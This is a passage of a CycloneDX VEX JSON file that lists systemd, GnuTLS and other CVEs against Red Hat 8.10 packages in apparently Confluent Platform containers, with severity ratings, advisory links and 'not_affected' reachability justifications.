          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2021-3997",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
      "description": "A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-3997"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-3997"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2024639"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3997"
        },
        {
          "url": "https://security.gentoo.org/glsa/202305-15"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5226-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-3997"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2022/01/10/2"
        }
      ],
      "published": "2022-08-23T20:15:08+00:00",
      "updated": "2026-06-17T04:06:21+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2021-4209",
      "ratings": [
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "A NULL pointer dereference flaw was found in GnuTLS. As Nettle's hash update functions internally call memcpy, providing zero-length input may cause undefined behavior. This flaw leads to a denial of service after authentication in rare circumstances.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-4209"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-4209"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2044156"
        },
        {
          "url": "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568"
        },
        {
          "url": "https://gitlab.com/gnutls/gnutls/-/issues/1306"
        },
        {
          "url": "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4209"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20220915-0005/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5550-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5750-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-4209"
        }
      ],
      "published": "2022-08-24T16:15:09+00:00",
      "updated": "2026-06-17T04:19:13+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.16-8.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2022-27943",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
